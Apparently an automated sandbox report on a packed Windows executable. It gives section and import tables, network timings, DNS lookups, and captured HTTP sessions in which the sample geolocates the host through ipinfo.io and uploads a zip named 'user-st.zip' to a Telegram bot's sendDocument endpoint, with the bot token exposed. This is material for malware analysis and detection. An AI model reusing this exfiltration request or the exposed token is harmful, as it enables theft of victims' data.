                                                                                                                                                              .xdata0x2e0000x10dc0x1200False0.23177083333333334shared library4.439285848535804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                                                                                                              .bss0x300000xfc800x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .idata0x400000xc280xe00False0.31417410714285715data3.8374507523409167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .CRT0x410000x680x200False0.072265625data0.2843074176589459IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              .tls0x420000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                              DLLImport
                                                                                                                                                              KERNEL32.dllCloseHandle, CreateDirectoryW, CreateFileW, CreateProcessW, DeleteCriticalSection, EnterCriticalSection, FormatMessageA, FreeLibrary, GenerateConsoleCtrlEvent, GetCommandLineW, GetCurrentProcessId, GetExitCodeProcess, GetLastError, GetModuleFileNameW, GetModuleHandleA, GetProcAddress, GetProcessId, GetStartupInfoA, GetSystemTimeAsFileTime, GetTempPathW, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, ReadFile, SetConsoleCtrlHandler, SetEnvironmentVariableA, SetFilePointer, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte, WriteFile
                                                                                                                                                              msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __argv, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _assert, _cexit, _commode, _errno, _fmode, _initterm, _lock, _onexit, _putws, _unlock, _wcsicmp, abort, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, mbstowcs, memcpy, memmove, memset, puts, signal, strerror, strlen, strncmp, strncpy, vfprintf, wcslen
                                                                                                                                                              SHELL32.dllCommandLineToArgvW, SHFileOperationW
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Sep 1, 2023 13:40:03.990644932 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:03.990746975 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:03.990837097 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:03.992069006 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:03.992110968 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.066904068 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.067769051 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:04.067853928 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.069613934 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.069700956 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:04.071506977 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:04.071624041 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.071738005 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:04.071769953 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.117836952 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:04.227171898 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.227368116 CEST4434970534.117.59.81192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:04.227475882 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:04.228296995 CEST49705443192.168.2.434.117.59.81
                                                                                                                                                              Sep 1, 2023 13:40:10.466976881 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.467052937 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.467171907 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.468185902 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.468226910 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.541923046 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.542623997 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.542687893 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.543992996 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.544121981 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.545370102 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.545475006 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.545629025 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.545654058 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.545767069 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.545798063 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.545815945 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.545994997 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546039104 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546241045 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546299934 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546488047 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546529055 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546591997 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546621084 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546693087 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546730042 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546756983 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546777010 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546847105 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546847105 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546847105 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.546883106 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546915054 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546938896 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.546986103 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547007084 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547049999 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547072887 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547117949 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547142982 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547182083 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547229052 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547281027 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547281027 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547307014 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547334909 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547380924 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547405958 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547435999 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547456026 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547501087 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547522068 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547574043 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547595978 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547615051 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547631979 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547688961 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547715902 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.547761917 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547817945 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547858953 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547889948 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547934055 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547985077 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.547985077 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548027992 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548080921 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548124075 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548180103 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548199892 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548271894 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548319101 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548348904 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548425913 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548486948 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.548513889 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.591538906 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.591965914 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.592036963 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.592086077 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.592111111 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.592125893 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:10.592137098 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:11.016801119 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:11.017069101 CEST44349706149.154.167.220192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:11.017177105 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              Sep 1, 2023 13:40:11.018079996 CEST49706443192.168.2.4149.154.167.220
                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                              Sep 1, 2023 13:40:03.957787991 CEST6031653192.168.2.48.8.8.8
                                                                                                                                                              Sep 1, 2023 13:40:03.978313923 CEST53603168.8.8.8192.168.2.4
                                                                                                                                                              Sep 1, 2023 13:40:10.439361095 CEST5181653192.168.2.48.8.8.8
                                                                                                                                                              Sep 1, 2023 13:40:10.463136911 CEST53518168.8.8.8192.168.2.4
                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                              Sep 1, 2023 13:40:03.957787991 CEST192.168.2.48.8.8.80xe357Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                              Sep 1, 2023 13:40:10.439361095 CEST192.168.2.48.8.8.80xe78bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                              Sep 1, 2023 13:40:03.978313923 CEST8.8.8.8192.168.2.40xe357No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                              Sep 1, 2023 13:40:10.463136911 CEST8.8.8.8192.168.2.40xe78bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                              • ipinfo.io
                                                                                                                                                              • api.telegram.org
                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.44970534.117.59.81443C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-09-01 11:40:04 UTC0OUTGET /json HTTP/1.1
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              Host: ipinfo.io
                                                                                                                                                              User-Agent: Python-urllib/3.9
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-09-01 11:40:04 UTC0INHTTP/1.1 200 OK
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                              content-length: 291
                                                                                                                                                              date: Fri, 01 Sep 2023 11:40:04 GMT
                                                                                                                                                              x-envoy-upstream-service-time: 2
                                                                                                                                                              strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                              Via: 1.1 google
                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-09-01 11:40:04 UTC0INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 32 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 35 32 2d 34 32 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 5a c3 bc 72 69 63 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 33 38 37 36 2c 38 2e 35 32 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 38 30 30 35 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 72 65 61 64 6d 65
                                                                                                                                                              Data Ascii: { "ip": "84.17.52.42", "hostname": "unn-84-17-52-42.cdn77.com", "city": "Zrich", "region": "Zurich", "country": "CH", "loc": "47.3876,8.5207", "org": "AS212238 Datacamp Limited", "postal": "8005", "timezone": "Europe/Zurich", "readme


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.449706149.154.167.220443C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              2023-09-01 11:40:10 UTC0OUTPOST /bot6484593640:AAElkexVP5gtsGF4EFBznaQGVxdfqLlGG3s/sendDocument HTTP/1.1
                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                              Content-Length: 656063
                                                                                                                                                              Host: api.telegram.org
                                                                                                                                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11
                                                                                                                                                              Content-Type: multipart/form-data; boundary=4c49b1f3a67a4c2585c4e333b5fb8eab
                                                                                                                                                              Connection: close
                                                                                                                                                              2023-09-01 11:40:10 UTC1OUTData Raw: 2d 2d 34 63 34 39 62 31 66 33 61 36 37 61 34 63 32 35 38 35 63 34 65 33 33 33 62 35 66 62 38 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 32 37 38 30 34 34 30 30 31 0d 0a 2d 2d 34 63 34 39 62 31 66 33 61 36 37 61 34 63 32 35 38 35 63 34 65 33 33 33 62 35 66 62 38 65 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 6a 6f 6e 65 73 2d 73 74 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 0d 0a 50 4b
                                                                                                                                                              Data Ascii: --4c49b1f3a67a4c2585c4e333b5fb8eabContent-Disposition: form-data; name="chat_id"278044001--4c49b1f3a67a4c2585c4e333b5fb8eabContent-Disposition: form-data; name="document"; filename="user-st.zip"Content-Type: application/x-zip-compressedPK
                                                                                                                                                              2023-09-01 11:40:10 UTC17OUTData Raw: 46 03 23 c9 4f d2 aa 27 bd 35 3b f3 0e fb 4f 31 9f d6 c8 40 e7 3e 19 d7 93 49 54 9a 62 a2 eb 6e cd c9 c9 6c 3f 97 75 44 93 61 1f f5 9e 95 23 fb 65 1e b7 b9 af 6f 16 9b 56 a0 65 72 77 74 c1 8a 60 d3 75 ec f8 c7 a6 97 f8 ae ba 38 19 98 29 9c 7f 3e 5f 79 dd e9 f2 c3 4a bd b9 73 e8 4f 9a e5 7f 75 5c be b5 5f 78 f2 f0 bc 9f ca cd 86 29 3d 63 c5 37 ef 6a 1e 4e 9d 38 ea 90 de c9 ba 27 3d 9c 76 55 44 3a 74 66 ba 07 43 aa 21 de cc 58 b5 89 71 bb ce 42 39 47 bb 93 42 bc 3f 97 d7 75 46 01 d0 d1 0f c5 07 31 5f 3e 1c 4d 7c 7f 5b f4 d7 21 33 d2 ef 46 46 3d 33 93 18 5e fa 56 41 cf ff 30 cd 7b 4c 6e 49 32 91 e4 76 da 7c d1 84 ee 0f ca cc d5 ff 0d c7 42 2d c7 fd 86 3b f9 bb da 97 46 3f 5d de 96 47 12 b7 d7 29 da 03 d9 35 ad f9 6f bf bf ba 08 09 71 a5 5f fe 78 53 f9 c6 2b
                                                                                                                                                              Data Ascii: F#O'5;O1@>ITbnl?uDa#eoVerwt`u8)>_yJsOu\_x)=c7jN8'=vUD:tfC!XqB9GB?uF1_>M|[!3FF=3^VA0{LnI2v|B-;F?]G)5oq_xS+
                                                                                                                                                              2023-09-01 11:40:10 UTC33OUTData Raw: 72 a2 78 39 19 ee ff e7 a9 18 77 9d 41 c3 52 12 d3 93 58 7d 5c b8 3f c4 c5 62 f0 bf 63 d6 24 e1 c3 30 a4 f1 12 ed 3a a7 0a 23 56 b3 34 1d 8a bc 87 c9 6d ab 2c 79 2d eb e1 c4 d2 f3 0d e2 c0 34 5a 8c 77 0f 08 c8 80 99 c3 a3 47 b6 77 60 9b ac 92 73 7c 78 38 45 72 b3 90 74 3c ae 38 b9 a3 f3 3b 1f c1 bf e4 6f 34 8b 85 b2 4f 63 be cc 15 f4 41 ba c5 5c 7a 64 3f 7a cd 06 96 c7 6b 62 ce 21 eb ba e7 2f c1 68 7f 09 11 3a 6f 2b 8d 1c 97 15 a8 31 cd af 7e c4 c8 62 d6 7c 1f 64 6c 04 85 5d 53 15 f7 45 97 75 b0 99 ec 06 fc ae 06 31 a0 50 7f 48 f7 2e b8 ec eb 32 32 89 52 fb 17 f0 fd 29 9d d5 41 9a 97 93 df fc bb 0b bf a3 61 8d b4 c7 ae c9 34 5b cd 8d 73 ca cb 17 39 89 e2 85 56 4c 58 11 9b 6b be 62 79 cd cb 67 83 cc 43 f7 89 e9 1b 36 c3 59 62 02 57 7a 32 f2 ea 83 72 9a ca
                                                                                                                                                              Data Ascii: rx9wARX}\?bc$0:#V4m,y-4ZwGw`s|x8Ert<8;o4OcA\zd?zkb!/h:o+1~b|dl]SEu1PH.22R)Aa4[s9VLXkbygC6YbWz2r
                                                                                                                                                              2023-09-01 11:40:10 UTC49OUTData Raw: 1e 72 a6 f6 b3 3d b9 90 01 c9 f3 23 51 c4 2e d3 09 d8 e8 cc 69 1c e4 ba 53 83 de 90 f7 23 04 e6 2b 16 5c 04 0e b1 8c 32 90 a8 50 04 12 57 12 4b c7 3f 8a 97 20 08 aa f0 d4 07 1d 85 10 04 e7 0d a7 56 44 55 1b ca 68 49 7e 58 98 17 56 ad dd 7e 1f 4c a2 d1 65 01 a8 87 d5 0f 68 cb 86 84 20 08 e8 55 83 58 6f 37 5a 4d 8a 56 0a 0f d9 2c fb d3 14 38 b9 c6 39 41 67 ff 61 a1 3e b7 7f 36 50 05 39 dc 8f bd 6f 8e 2d c3 13 5f e6 b5 74 8f 4b e4 b5 ee 04 e1 4f 02 9c f2 bf c2 55 32 83 ce 77 49 06 d3 7c 76 5e e1 ff 7d 0e a9 8d 66 78 ab 76 bc 08 cd 69 b7 d2 70 64 20 6c b4 0c e7 6a 7f 78 a8 81 0a 09 78 a0 78 19 71 39 48 38 4c 63 c6 06 54 63 29 e9 12 17 f9 6c 3a 2c cd 93 aa 9e 3d 95 d6 56 43 d4 51 6a 91 6d d4 74 85 e7 f5 0f e1 9c 10 f6 b3 93 b9 dc 0f 8e 60 d9 72 50 e5 fa e4 a0
                                                                                                                                                              Data Ascii: r=#Q.iS#+\2PWK? VDUhI~XV~Leh UXo7ZMV,89Aga>6P9o-_tKOU2wI|v^}fxvipd ljxxxq9H8LcTc)l:,=VCQjmt`rP
                                                                                                                                                              2023-09-01 11:40:10 UTC65OUTData Raw: ab bd 70 34 e9 f5 72 fc a8 fa f7 8e d6 c7 7b d3 f5 15 df 6e ba 58 68 3d 9e eb 51 61 9e ca 52 f1 81 a0 e7 1f 83 4d a9 01 a4 e8 9f ee bb 1d 3b 6d 16 56 2d f9 43 9f 63 6c 20 18 eb 9d 0d 45 10 e3 fe 23 41 30 03 31 46 ec 9a 80 5f 8b 7d 07 db 91 ed 0b 27 ef 96 bd ca 05 bf 2b 81 ff 9d dd 6a 4e 5d 36 fb 6d 14 fe 55 f8 14 c0 65 45 8a 49 6f 3b 81 14 dd d6 83 61 e9 bd 8d bc d7 66 04 25 68 e1 4a f3 40 6f 4e b8 b4 69 e7 75 25 73 1d e5 76 78 d8 c7 99 f5 b2 69 13 a0 4e 41 9b 01 82 91 83 8c 20 8d 6c 25 e7 0d c9 94 eb 41 4b 58 5f af f0 ad 54 04 50 4a 86 a3 52 13 c7 4a b9 b5 c6 99 ed 12 e3 27 6f ea 89 02 32 0d 68 01 c5 0e 96 be b5 2a 6c 8d dd a3 1a 98 35 9b 9d c0 72 5c 60 18 b0 34 5a 62 fe e9 ea 49 e1 b9 01 59 44 c9 75 97 73 ad 7e 94 86 54 5e bd 61 fa 6e 4f 0e c5 4b 37 bc
                                                                                                                                                              Data Ascii: p4r{nXh=QaRM;mV-Ccl E#A01F_}'+jN]6mUeEIo;af%hJ@oNiu%svxiNA l%AKX_TPJRJ'o2h*l5r\`4ZbIYDus~T^anOK7
                                                                                                                                                              2023-09-01 11:40:10 UTC81OUTData Raw: 02 93 71 f7 8b df 7b 72 11 d1 8d 6e a6 69 96 1f 82 fc c1 c8 23 52 68 25 b6 b9 43 79 5d 67 66 87 d1 95 d7 83 40 32 ef 21 58 8b e5 e0 69 20 8d f3 33 78 72 aa 3a 89 39 ce ea ad b8 cb 90 64 64 d1 1f ca 4d b6 16 b6 ed 96 58 ea f7 a5 1b 8f a1 94 3a e4 41 49 11 44 35 e8 b9 64 cf f7 9a 20 d4 0f c8 f1 03 c4 ac 90 2b 18 b5 43 cb 43 03 2c 7c 6c 08 af 68 e4 05 f6 1c d3 9d 41 a8 26 38 c7 f2 e4 c9 b6 ad 31 6e 3b cb da b2 62 a5 fb 25 2c e5 f1 90 18 de 94 0a 4d 09 5c ef 67 b2 78 49 d5 db 02 81 5e 84 36 d9 a6 e5 aa 9b 0f 3e 6c 31 32 66 78 fd fa 31 b7 45 98 99 fe bd 03 52 39 e9 ba 50 9f e0 e0 82 10 88 b2 05 41 68 7e 2f a3 40 57 00 90 5c f4 ad 1f ed 2a 94 0c 82 27 60 23 fa d1 d2 a9 74 83 68 31 c0 54 68 e4 38 5b d3 1e 70 57 27 de 9a c6 32 de 05 d2 cb 58 45 e8 89 4b 2f c2 46
                                                                                                                                                              Data Ascii: q{rni#Rh%Cy]gf@2!Xi 3xr:9ddMX:AID5d +CC,|lhA&81n;b%,M\gxI^6>l12fx1ER9PAh~/@W\*'`#th1Th8[pW'2XEK/F
